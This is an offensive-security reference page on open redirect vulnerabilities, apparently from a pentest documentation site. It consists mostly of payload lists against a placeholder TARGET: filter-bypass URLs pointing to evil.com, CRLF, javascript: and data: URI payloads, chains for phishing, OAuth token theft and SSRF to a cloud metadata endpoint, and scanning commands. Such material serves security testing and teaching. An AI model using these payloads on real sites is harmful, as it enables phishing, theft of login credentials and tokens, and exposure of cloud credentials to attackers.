> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Open Redirect

> Open redirect vulnerabilities: detection, bypass techniques, and exploitation for phishing and token theft.

## Overview

Application redirects user to attacker-controlled URL via unvalidated parameter. Used for phishing, OAuth token theft, and SSRF chain.

***

## Common Parameters

```
?url=
?redirect=
?next=
?return=
?returnUrl=
?rurl=
?dest=
?destination=
?redir=
?redirect_uri=
?redirect_url=
?forward=
?forward_url=
?target=
?to=
?out=
?view=
?login?to=
?image_url=
?go=
?continue=
?checkout_url=
```

***

## Detection

```
https://TARGET/login?redirect=https://evil.com
https://TARGET/redirect?url=https://evil.com
https://TARGET/out?to=https://evil.com
```

Check if browser redirects to `evil.com`.

***

## Bypass Techniques

### Double URL Encoding

```
https://TARGET/redirect?url=https%3A%2F%2Fevil.com
https://TARGET/redirect?url=https%253A%252F%252Fevil.com
```

### Using @ Symbol

```
https://TARGET/redirect?url=https://TARGET@evil.com
https://TARGET/redirect?url=https://evil.com#@TARGET
```

Browser resolves `user@host` — actual destination is `evil.com`.

### Backslash

```
https://TARGET/redirect?url=https://evil.com\@TARGET
https://TARGET/redirect?url=//evil.com\@TARGET
```

### Protocol-Relative

```
https://TARGET/redirect?url=//evil.com
https://TARGET/redirect?url=\/\/evil.com
```

### Subdomain Trick

```
https://TARGET/redirect?url=https://TARGET.evil.com
https://TARGET/redirect?url=https://evil.com/TARGET
```

### Null Byte / Whitespace

```
https://TARGET/redirect?url=https://evil.com%00.TARGET
https://TARGET/redirect?url=https://evil.com%0d%0a.TARGET
https://TARGET/redirect?url=https://evil.com%09
```

### CRLF Injection in Redirect

```
https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com
```

### JavaScript Protocol

```
https://TARGET/redirect?url=javascript:alert(document.domain)
https://TARGET/redirect?url=java%0d%0ascript:alert(1)
```

### Data URI

```
https://TARGET/redirect?url=data:text/html,<script>window.location='https://evil.com'</script>
```

### Dot Bypass

```
https://TARGET/redirect?url=https://evil。com          # Fullwidth dot
https://TARGET/redirect?url=https://evil%E3%80%82com
```

### Path Traversal

```
https://TARGET/redirect?url=/\evil.com
https://TARGET/redirect?url=/.evil.com
https://TARGET/redirect?url=/evil.com/..;/
```

***

## Exploitation

### Phishing

```
https://legit-site.com/login?redirect=https://evil-site.com/fake-login
```

Victim sees legitimate domain in link → enters credentials on fake page.

### OAuth Token Theft

```
https://auth.TARGET/authorize?client_id=APP&redirect_uri=https://TARGET/callback?next=https://evil.com
```

OAuth flow redirects token to attacker via chained open redirect.

### SSRF Chain

If server-side follows redirect:

```
https://TARGET/fetch?url=https://TARGET/redirect?url=http://169.254.169.254/latest/meta-data/
```

### XSS via javascript: Protocol

```
https://TARGET/redirect?url=javascript:alert(document.cookie)
```

***

## Automation

### Fuzzing Parameters

```bash theme={"dark"}
# Find redirect parameters
cat urls.txt | grep -iE "redirect|url|next|return|dest|forward|to|go|continue" | sort -u
```

### With gf Patterns

```bash theme={"dark"}
cat urls.txt | gf redirect
```

### Nuclei

```bash theme={"dark"}
nuclei -tags redirect -l urls.txt
```

***

## Quick Reference

| Bypass            | Payload                             |
| ----------------- | ----------------------------------- |
| Basic             | `?url=https://evil.com`             |
| @ trick           | `?url=https://TARGET@evil.com`      |
| Protocol-relative | `?url=//evil.com`                   |
| Subdomain         | `?url=https://TARGET.evil.com`      |
| Backslash         | `?url=//evil.com\@TARGET`           |
| Double encode     | `?url=https%253A%252F%252Fevil.com` |
| javascript:       | `?url=javascript:alert(1)`          |

***

## Sources

* [OWASP — Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)
* [PortSwigger — Open Redirect](https://portswigger.net/kb/issues/00500100_open-redirection-reflected)
* [CWE-601 — URL Redirection to Untrusted Site](https://cwe.mitre.org/data/definitions/601.html)
